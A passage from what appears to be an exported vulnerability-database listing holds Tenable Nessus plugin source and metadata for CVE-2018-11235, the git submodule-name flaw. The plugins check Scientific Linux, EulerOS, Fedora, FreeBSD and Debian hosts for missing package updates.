packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:emacs-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:emacs-git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-bzr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-hg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:gitweb\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Git-SVN\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", reference:\"emacs-git-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"emacs-git-el-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"git-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-all-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-bzr-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-cvs-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"git-daemon-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"git-debuginfo-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-email-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-gui-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-hg-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-p4-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"git-svn-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"gitk-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"gitweb-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"perl-Git-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"perl-Git-SVN-1.8.3.1-14.el7_5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n 
exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"emacs-git / emacs-git-el / git / git-all / git-bzr / git-cvs / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:31:50", "description": "According to the version of the git packages installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-07-03T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP2 : git (EulerOS-SA-2018-1215)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:git", "p-cpe:/a:huawei:euleros:perl-Git", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1215.NASL", "href": "https://www.tenable.com/plugins/nessus/110879", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110879);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2018-11235\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : git (EulerOS-SA-2018-1215)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"According to the version of the git packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - arbitrary code execution when recursively cloning a\n malicious repository (CVE-2018-11235)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1215\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3303335f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"git-1.8.3.1-14.h2\",\n \"perl-Git-1.8.3.1-14.h2\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:29:05", 
"description": "Update to 0.26.4 (CVE-2018-11235)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : libgit2 (2018-b10e54263a)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libgit2", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-B10E54263A.NASL", "href": "https://www.tenable.com/plugins/nessus/120715", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-b10e54263a.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120715);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-11235\");\n script_xref(name:\"FEDORA\", value:\"2018-b10e54263a\");\n\n script_name(english:\"Fedora 28 : libgit2 (2018-b10e54263a)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 0.26.4 (CVE-2018-11235)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-b10e54263a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libgit2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libgit2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"libgit2-0.26.4-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgit2\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:54:27", "description": "The Git community reports :\n\nInsufficient validation of submodule names", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-18T00:00:00", "type": "nessus", "title": "FreeBSD : Libgit2 -- Fixing insufficient validation of submodule names (5a1589ad-68f9-11e8-83f5-d8cb8abf62dd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": 
["CVE-2018-11235"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:libgit2", "p-cpe:/a:freebsd:freebsd:py-pygit2", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_5A1589AD68F911E883F5D8CB8ABF62DD.NASL", "href": "https://www.tenable.com/plugins/nessus/110579", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110579);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2018-11235\");\n\n script_name(english:\"FreeBSD : Libgit2 -- Fixing insufficient validation of submodule names (5a1589ad-68f9-11e8-83f5-d8cb8abf62dd)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Git community reports :\n\nInsufficient validation of submodule names\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/libgit2/libgit2/releases/tag/v0.27.1\"\n );\n # https://vuxml.freebsd.org/freebsd/5a1589ad-68f9-11e8-83f5-d8cb8abf62dd.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1f4581ae\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:libgit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py-pygit2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"libgit2<0.27.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py-pygit2<0.27.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:54:00", "description": "Etienne Stalmans discovered that git, a fast, scalable, distributed revision control system, is prone to an arbitrary code execution vulnerability exploitable via 
specially crafted submodule names in a .gitmodules file.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-05-30T00:00:00", "type": "nessus", "title": "Debian DSA-4212-1 : git - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:git", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4212.NASL", "href": "https://www.tenable.com/plugins/nessus/110207", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4212. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110207);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/04/05 23:25:05\");\n\n script_cve_id(\"CVE-2018-11235\");\n script_xref(name:\"DSA\", value:\"4212\");\n\n script_name(english:\"Debian DSA-4212-1 : git - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Etienne Stalmans discovered that git, a fast, scalable, distributed\nrevision control system, is prone to an arbitrary code execution\nvulnerability exploitable via specially crafted submodule names in a\n.gitmodules file.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/git\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/git\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/git\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4212\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the git packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 1:2.1.4-2.1+deb8u6.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 1:2.11.0-3+deb9u3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"git\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-all\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-arch\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-core\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-cvs\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-daemon-run\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-daemon-sysvinit\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-doc\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-el\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-email\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-gui\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-man\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"git-mediawiki\", reference:\"1:2.1.4-2.1+deb8u6\")) flag++;\nif 